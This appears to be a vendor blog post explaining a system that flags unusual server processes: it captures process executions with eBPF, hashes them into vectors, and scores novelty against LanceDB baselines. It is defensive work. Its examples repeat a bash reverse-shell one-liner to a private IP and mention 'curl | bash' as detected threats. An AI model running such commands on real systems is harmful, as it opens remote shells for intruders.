Detecting unusual processes on your servers without writing a single rule


Most security tooling works by asking you to define what "bad" looks like upfront. Falco gives you YAML rules. OSSEC has signatures. Wazuh has a 5,000-line ruleset that ships with the product and still misses half of what matters in your specific environment. The problem isn't that rules are bad; it's that they can only catch what someone already thought to write a rule for. A novel attack, an unusual deployment pattern, or a rogue process your team introduced six months ago and forgot about will all sail straight through.

We wanted something different: a system that learns what "normal" looks like on each server and workload automatically, and flags anything that deviates, without any configuration. Here's how we built it using eBPF and LanceDB.

Step 1: Capture everything at the kernel level with eBPF

eBPF lets you attach programs to kernel events with minimal overhead. We attach to the sys_enter_execve tracepoint, which fires every time any process is executed on the machine, before the new program even starts running. For each execution we capture:

- The process name (comm) and full command line (argv)
- The parent process name
- The UID of the calling process
- Any active network connections (src/dst IP, port)

This is written in Rust using the Aya framework, which compiles the eBPF kernel program separately and loads it at runtime:

    #[tracepoint]
    pub fn gretl_execve(ctx: TracePointContext) -> u32 {
        // `?` needs a Result return type, so the fallible work lives in a helper.
        try_gretl_execve(&ctx).unwrap_or(0)
    }

    fn try_gretl_execve(ctx: &TracePointContext) -> Result<u32, i64> {
        // Offset 16 of the sys_enter_execve record holds the filename pointer.
        let filename_ptr = unsafe { ctx.read_at::<u64>(16)? } as *const u8;
        let pidtgid = bpf_get_current_pid_tgid();
        // The upper 32 bits are the process ID as userspace sees it.
        let pid = (pidtgid >> 32) as u32;

        let mut event = ExecveEvent {
            pid,
            comm: [0u8; 16],
            filename: [0u8; 64],
            argv1: [0u8; 64],
            // ...
        };

        if let Ok(comm) = bpf_get_current_comm() {
            event.comm = comm;
        }

        Ok(emit_execve(&event))
    }

The events are written to a ring buffer and consumed by the userspace agent, which batches them and POSTs to the backend every 60 seconds.
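The batch-and-flush behaviour described above can be sketched in a few lines. This is an illustration under assumptions, not the agent's actual code: `ExecEvent`, `EventBatcher`, the `maxPending` cap, and the injected `send` callback are all hypothetical names, and the real agent drains an eBPF ring buffer rather than receiving `push` calls.

```typescript
// Hypothetical shape of one captured event (field names are assumptions).
interface ExecEvent {
  pid: number;
  comm: string;
  cmdline: string;
}

// Collects events in memory and hands them to `send` as one batch.
class EventBatcher {
  private pending: ExecEvent[] = [];

  constructor(
    private readonly send: (batch: ExecEvent[]) => Promise<void>,
    private readonly maxPending: number = 10_000, // bound memory if the backend is down
  ) {}

  get size(): number {
    return this.pending.length;
  }

  push(event: ExecEvent): void {
    // When the cap is reached, drop the oldest event to make room.
    if (this.pending.length >= this.maxPending) this.pending.shift();
    this.pending.push(event);
  }

  // Sends everything collected so far and returns how many events were sent.
  // On failure the batch is put back so the next flush retries it.
  async flush(): Promise<number> {
    if (this.pending.length === 0) return 0;
    const batch = this.pending;
    this.pending = [];
    try {
      await this.send(batch);
      return batch.length;
    } catch {
      this.pending = batch.concat(this.pending).slice(-this.maxPending);
      return 0;
    }
  }
}
```

In a real agent, `flush` would be driven by a 60-second timer and `send` would POST the batch to the backend. Re-queueing on failure is a design choice of this sketch; the article does not say how the agent handles a failed POST.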
On kernel ≥ 5.8 with BTF enabled, zero instrumentation is required: no agents inside your containers, no sidecars, no changes to your application code. For servers without eBPF support, the Node.js agent falls back to reading /proc/<pid>/cmdline and /proc/<pid>/status directly, tracking new PIDs each interval. You lose the real-time kernel hook but still get the process telemetry.

Step 2: Represent each process execution as a vector

The raw event (a process name, a cmdline string, a parent process, a port) isn't directly comparable. To measure similarity between executions, we need to turn each event into a fixed-length vector. We use feature hashing: tokenise the event fields, hash each token into a position in a 128-dimensional vector, and accumulate signed contributions. The result is normalised to a unit vector.

    function featureVector(event: ProcessEvent): number[] {
      const vec = new Float32Array(128);
      const tokens = [
        event.process_name,
        event.parent_process,
        event.event_type,
        String(event.local_port),
        String(event.remote_port),
        ...tokenise(event.cmdline), // split cmdline into meaningful tokens
      ];

      for (let i = 0; i < tokens.length; i++) {
        const t = tokens[i].toLowerCase().trim();
        if (!t) continue;
        // One hash picks the bucket, a second picks the sign.
        const idx = hashStr(t, i * 31) % 128;
        const sign = hashStr(t, i * 31 + 1) & 1 ? 1 : -1;
        vec[idx] += sign;
      }

      // L2 normalise so cosine distance is well-defined
      let norm = 0;
      for (let i = 0; i < 128; i++) norm += vec[i] * vec[i];
      norm = Math.sqrt(norm) || 1;
      return Array.from(vec).map((v) => v / norm);
    }

Feature hashing is deterministic, requires no external model, adds negligible latency, and works well for this kind of structured-text input. A bash -i >& /dev/tcp/... command and a normal bash --login invocation will land in very different regions of the vector space.

Why not use a neural embedding model?

We looked at this seriously.
Models like all-MiniLM-L6-v2 (22 MB, 384 dims) or OpenAI's text-embedding-3-small would give richer semantic similarity: they know that sh and bash are both shells, that /tmp and /dev/shm are both writable scratch paths. The problem is the operational cost at ingestion time. The agent reports process events roughly every 60 seconds per server. For a fleet of 50 servers that's ~3,000 reports per hour (50 servers × 60 reports each), and every event in them needs an embedding before it can be scored and stored. The options were:

- Local model on the backend: works, but adds a cold-start dependency, ~200 MB of model weights on disk, and 5–20 ms of CPU per event. On a small Fly.io instance shared with the API server, that's noticeable.
- External API (e.g. OpenAI): adds network latency to every ingest request, a per-token cost that scales with fleet size, and a hard external dependency that can take your security pipeline down.
- Feature hashing: runs in <0.1 ms, zero dependencies, no network calls, fully deterministic. The same input always produces the same vector, which also makes testing straightforward.

For this specific input (structured fields like process names, parent processes, cmdline tokens) feature hashing performs surprisingly well. bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 and bash --login land in very different regions of the vector space because their token sets barely overlap. That's all we need for anomaly scoring.

The embedding layer is intentionally isolated behind a single featureVector function. Swapping it for a neural model later is a one-function change: the scoring logic, the LanceDB tables, and the API surface don't care what's inside it.

Step 3: Store and query with LanceDB

LanceDB is an embedded vector database: it runs inside your process, stores data on disk, and supports fast approximate nearest-neighbour search with no separate infrastructure required.

We create one LanceDB table per (org_id, workload) pair. Each row stores the 128-dim vector and a timestamp.
The table grows as new events arrive, and old entries are pruned after 7 days.

    export async function scoreAndLearn(
      org_id: string,
      workload: string,
      event: ProcessEvent,
    ): Promise<number> {
      const conn = await db();
      const table = await getOrCreateTable(conn, tableName(org_id, workload));
      const vec = featureVector(event);

      // Find k=10 nearest neighbours in this workload's history
      const results = await table.vectorSearch(vec).limit(10).toArray();

      let score = 1.0; // default: completely unseen
      if (results.length > 0) {
        const distances = results.map((r) => cosineDistance(vec, Array.from(r.vector)));
        const minDist = Math.min(...distances);
        score = Math.min(1, minDist * 2); // scale and clamp to 0–1
      }

      // Add this event to the baseline for future comparisons.
      // Awaited so that a failed write surfaces as an error.
      await table.add([{ vector: vec, ts: Date.now() }]);
      return score;
    }

The anomaly score is close to 0 for an event that matches something already in the baseline, and 1 for something completely new. It gets stored alongside the event in ClickHouse so you can query, filter, and alert on it.

Step 4: Natural language search

Once every event is a vector, querying by description becomes straightforward. We embed the search query using the same feature-hashing pipeline and run a nearest-neighbour search across all workload tables.

    // In the dashboard Security tab:
    // "show me anything that looks like a reverse shell"
    POST /telemetry/security/search
    { "query": "reverse shell bash outbound connection" }

This returns the events whose vectors are closest to the query vector, ranked by vector similarity rather than exact string matches. A process running bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 can rank highly even though it doesn't contain the literal words "reverse shell".

What it looks like in practice

After running on a production server for a few days, the baseline learns what "normal" looks like: your web server process, your cron jobs, your deployment scripts.
Then:

- A developer accidentally leaves a debug shell running → anomaly score 0.85, flagged as warn
- Your CI/CD pipeline runs a new build script for the first time → score 0.72 on first run, drops to 0.1 after the second run
- Someone runs curl | bash as root → score 0.94, flagged immediately
- Your usual nginx worker restarts → score 0.02, ignored

No rules were written for any of these. The system learned the baseline automatically and the deviations surfaced on their own.

The architecture in one diagram

    Server                       Backend                            Storage
    ──────                       ───────                            ───────
    eBPF (kernel) ──execve──▶    /otlp/v1/events
                                        │
    /proc fallback ──────────▶          │
                                        ▼
                                 featureVector()
                                        │
                                        ▼
                                 LanceDB (per workload) ──▶ anomaly score
                                                                  │
                                                                  ▼
                                                       ClickHouse.security_events
                                                                  │
                                                                  ▼
                                                        Dashboard + NL search

What's next

The current embedding is purely structural: it knows that bash and sh are different tokens, but doesn't know they're semantically similar shells. Upgrading to a small neural embedding model (something like all-MiniLM-L6-v2) would improve natural language search quality significantly, especially for queries phrased in plain English rather than technical terms.

We're also working on per-workload alert thresholds, so a security-sensitive production workload can be configured to alert at score 0.6, while a noisy dev environment uses a higher threshold of 0.85.

Try it on your servers

The agent installs in one command and starts building a baseline immediately. Works on any Linux server: EC2, GCP, bare metal. eBPF on kernel ≥ 5.8, /proc fallback everywhere else.

    GR_TOKEN=your-token bash <(curl -fsSL https://gretl.dev/install-agent.sh)
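
Appendix: helper sketches for Steps 2 and 3

The featureVector and scoreAndLearn listings call hashStr, tokenise, and cosineDistance without showing them. For readers who want to experiment locally, here is one possible set of definitions. These are assumptions, not the article's implementation: the hash is an FNV-1a-style hash over UTF-16 code units with the seed mixed into the initial state, and the tokeniser's separator set is a guess at what "meaningful tokens" might mean.

```typescript
// Seeded FNV-1a-style string hash (an assumed choice; any seeded hash would do).
// Returns an unsigned 32-bit integer, so `% 128` is never negative.
function hashStr(s: string, seed: number): number {
  let h = (0x811c9dc5 ^ seed) >>> 0; // FNV offset basis mixed with the seed
  for (let i = 0; i < s.length; i++) {
    h ^= s.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0; // multiply by the FNV prime, keep unsigned
  }
  return h;
}

// Splits a command line on whitespace and common shell/path separators,
// dropping empty tokens. The separator set is an assumption.
function tokenise(cmdline: string): string[] {
  return cmdline.split(/[\s\/=:|&;<>]+/).filter((t) => t.length > 0);
}

// Cosine distance = 1 - cosine similarity:
// 0 for the same direction, 1 for orthogonal vectors, 2 for opposite ones.
function cosineDistance(a: number[], b: number[]): number {
  let dot = 0;
  let normA = 0;
  let normB = 0;
  for (let i = 0; i < a.length; i++) {
    dot += a[i] * b[i];
    normA += a[i] * a[i];
    normB += b[i] * b[i];
  }
  const denom = Math.sqrt(normA) * Math.sqrt(normB);
  // Treat a zero vector as maximally uninformative rather than dividing by zero.
  return denom === 0 ? 1 : 1 - dot / denom;
}
```

Because cosine distance ranges from 0 to 2, a scoring step that doubles the minimum distance and clamps at 1 will assign the maximum score to anything whose nearest neighbour is at distance 0.5 or more.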